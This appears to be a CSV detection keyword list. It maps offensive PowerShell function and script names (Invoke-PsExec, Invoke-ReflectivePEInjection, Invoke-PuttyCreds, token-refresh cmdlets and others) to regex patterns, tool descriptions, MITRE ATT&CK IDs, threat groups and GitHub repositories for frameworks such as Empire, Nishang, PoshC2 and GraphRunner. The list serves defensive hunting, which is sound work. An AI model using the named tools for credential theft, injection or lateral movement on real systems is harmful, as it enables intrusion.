"*Invoke-PsExec*",".{0,1000}Invoke\-PsExec.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PSexec.ps1*",".{0,1000}Invoke\-PSexec\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-PsExec.ps1*",".{0,1000}Invoke\-PsExec\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1095","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*invoke-psexecpayload*",".{0,1000}invoke\-psexecpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-PsGcat*",".{0,1000}Invoke\-PsGcat.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PSGcat.ps1*",".{0,1000}Invoke\-PSGcat\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PsGcat.ps1*",".{0,1000}Invoke\-PsGcat\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PsGcatAgent*",".{0,1000}Invoke\-PsGcatAgent.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PsGcatAgent.ps1*",".{0,1000}Invoke\-PsGcatAgent\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PSImage*",".{0,1000}Invoke\-PSImage.{0,1000}","offensive_tool_keyword","Invoke-PSImage","Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to executenInvoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.","T1027 - T1218 - T1216 - T1059","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/peewpw/Invoke-PSImage","1","0","N/A","N/A","10","2121","398","2019-09-23T15:17:03Z","2017-12-17T18:41:44Z" "*Invoke-PSInject*",".{0,1000}Invoke\-PSInject.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PSInject.ps1*",".{0,1000}Invoke\-PSInject\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1085","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PSInject.ps1*",".{0,1000}Invoke\-PSInject\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Invoke-PSObfuscation*",".{0,1000}Invoke\-PSObfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*Invoke-PsUACme*",".{0,1000}Invoke\-PsUACme.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Invoke-PsUACme*",".{0,1000}Invoke\-PsUACme.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PsUACme*",".{0,1000}Invoke\-PsUACme.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-PsUACme.ps1*",".{0,1000}Invoke\-PsUACme\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PuttyCreds*",".{0,1000}Invoke\-PuttyCreds.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-Pwds.ps1*",".{0,1000}Invoke\-Pwds\.ps1.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*Invoke-RBDC*",".{0,1000}Invoke\-RBDC.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-RBDC-over-DAVRPC*",".{0,1000}Invoke\-RBDC\-over\-DAVRPC.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-RDPwrap.ps1*",".{0,1000}Invoke\-RDPwrap\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ReflectivePEInjection.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1107","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1083","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1137","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Invoke-ReflectivePEInjection.*",".{0,1000}Invoke\-ReflectivePEInjection\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Invoke-ReflectivePEInjection.ps1*",".{0,1000}Invoke\-ReflectivePEInjection\.ps1.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Invoke-ReflectivePEInjection.ps1*",".{0,1000}Invoke\-ReflectivePEInjection\.ps1.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*Invoke-RefreshAzureAppTokens -ClientId * -ClientSecret *",".{0,1000}Invoke\-RefreshAzureAppTokens\s\-ClientId\s.{0,1000}\s\-ClientSecret\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-RefreshGraphTokens*",".{0,1000}Invoke\-RefreshGraphTokens.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Use a refresh token to obtain new access tokens","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-RefreshToMSGraphToken -domain -ClientId *",".{0,1000}Invoke\-RefreshToMSGraphToken\s\-domain\s\-ClientId\s.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*Invoke-RefreshToSharePointToken*",".{0,1000}Invoke\-RefreshToSharePointToken.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-Reg1c1de*",".{0,1000}Invoke\-Reg1c1de.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" 